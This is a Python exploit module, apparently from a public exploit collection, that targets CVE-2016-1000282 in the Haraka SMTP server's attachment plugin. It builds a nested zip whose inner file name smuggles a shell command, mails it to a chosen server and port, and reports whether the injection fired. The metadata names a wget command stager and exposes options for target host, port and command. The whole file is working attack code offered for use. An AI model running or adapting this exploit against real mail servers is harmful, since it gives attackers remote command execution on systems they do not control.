115 lines
4.5 KiB
Python
Executable File
115 lines
4.5 KiB
Python
Executable File
#!/usr/bin/env python2.7
|
|
|
|
# Vendor Homepage: https://haraka.github.io/
|
|
# Software Link: https://github.com/haraka/Haraka
|
|
# Exploit github: http://github.com/outflankbv/Exploits/
|
|
# Vulnerable version link: https://github.com/haraka/Haraka/releases/tag/v2.8.8
|
|
# Version: <= Haraka 2.8.8 (with attachment plugin enabled)
|
|
# Tested on: Should be OS independent tested on Ubuntu 16.04.1 LTS
|
|
# Tested versions: 2.8.8 and 2.7.2
|
|
# Thanks to: Dexlab.nl for asking me to look at Haraka.
|
|
|
|
import smtplib
|
|
from email.mime.application import MIMEApplication
|
|
from email.mime.multipart import MIMEMultipart
|
|
from email.utils import COMMASPACE, formatdate
|
|
from email.header import Header
|
|
from email.utils import formataddr
|
|
from email.mime.text import MIMEText
|
|
from datetime import datetime
|
|
import zipfile
|
|
import StringIO
|
|
import sys, os, json
|
|
|
|
metadata = {
|
|
'name': 'Haraka SMTP Command Injection',
|
|
'description': '''
|
|
The Haraka SMTP server comes with a plugin for processing attachments.
|
|
Versions before 2.8.9 can be vulnerable to command injection
|
|
''',
|
|
'authors': ['xychix <xychix[AT]hotmail.com>', 'smfreegard', 'Adam Cammack <adam_cammack[AT]rapid7.com>'],
|
|
'date': '2017-01-26',
|
|
'references': [
|
|
{'type': 'cve', 'ref': '2016-1000282'},
|
|
{'type': 'edb', 'ref': '41162'},
|
|
{'type': 'url', 'ref': 'https://github.com/haraka/Haraka/pull/1606'},
|
|
],
|
|
'type': 'remote_exploit.cmd_stager.wget',
|
|
'privileged': True,
|
|
'targets': [
|
|
{'platform': 'linux', 'arch': 'x64'},
|
|
{'platform': 'linux', 'arch': 'x86'}
|
|
],
|
|
'options': {
|
|
'email_to': {'type': 'string', 'description': 'Email to send to, must be accepted by the server', 'required': True, 'default': 'admin@localhost'},
|
|
'email_from': {'type': 'string', 'description': 'Address to send from', 'required': True, 'default': 'foo@example.com'},
|
|
'rhost': {'type': 'address', 'description': 'Target server', 'required': True, 'default': None},
|
|
'rport': {'type': 'port', 'description': 'Target server port', 'required': True, 'default': 25}
|
|
}}
|
|
|
|
def log(message, level='info'):
|
|
print(json.dumps({'jsonrpc': '2.0', 'method': 'message', 'params': {
|
|
'level': level,
|
|
'message': message
|
|
}}))
|
|
sys.stdout.flush()
|
|
|
|
def send_mail(to, mailserver, cmd, mfrom, port):
|
|
msg = MIMEMultipart()
|
|
html = "harakiri"
|
|
msg['Subject'] = "harakiri"
|
|
msg['From'] = mfrom
|
|
msg['To'] = to
|
|
f = "harakiri.zip"
|
|
msg.attach(MIMEText(html))
|
|
log("Send harariki to %s, commandline: %s , mailserver %s is used for delivery"%(to, cmd, mailserver), 'debug')
|
|
part = MIMEApplication(create_zip(cmd),Name="harakiri.zip")
|
|
part['Content-Disposition'] = 'attachment; filename="harakiri.zip"'
|
|
msg.attach(part)
|
|
log("Sending mail to target server...")
|
|
log(msg.as_string(), 'debug')
|
|
s = smtplib.SMTP(mailserver, port)
|
|
try:
|
|
resp = s.sendmail(mfrom, to, msg.as_string())
|
|
except smtplib.SMTPDataError as err:
|
|
if err[0] == 450:
|
|
log("Triggered bug in target server (%s)"%err[1], 'good')
|
|
return(True)
|
|
log("Bug not triggered in target server", 'error')
|
|
log("it may not be vulnerable or have the attachment plugin activated", 'error')
|
|
s.close()
|
|
return(False)
|
|
|
|
class InMemoryZip(object):
|
|
def __init__(self):
|
|
self.in_memory_zip = StringIO.StringIO()
|
|
def append(self, filename_in_zip, file_contents):
|
|
zf = zipfile.ZipFile(self.in_memory_zip, "a", zipfile.ZIP_DEFLATED, False)
|
|
zf.writestr(filename_in_zip, file_contents)
|
|
for zfile in zf.filelist:
|
|
zfile.create_system = 0
|
|
return self
|
|
def read(self):
|
|
self.in_memory_zip.seek(0)
|
|
return self.in_memory_zip.read()
|
|
|
|
def create_zip(cmd="touch /tmp/harakiri"):
|
|
z1 = InMemoryZip()
|
|
z2 = InMemoryZip()
|
|
z2.append("harakiri.txt",
|
|
"Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.")
|
|
z1.append("a\";%s;echo \"a.zip"%cmd, z2.read())
|
|
return(z1.read())
|
|
|
|
if __name__ == '__main__':
|
|
req = json.loads(os.read(0, 10000))
|
|
if req['method'] == 'describe':
|
|
print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata}))
|
|
elif req['method'] == 'run':
|
|
args = req['params']
|
|
send_mail(args['email_to'], args['rhost'], args['command'], args['email_from'], int(args['rport']))
|
|
print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': {
|
|
'message': 'Exploit completed'
|
|
}}))
|
|
sys.stdout.flush()
|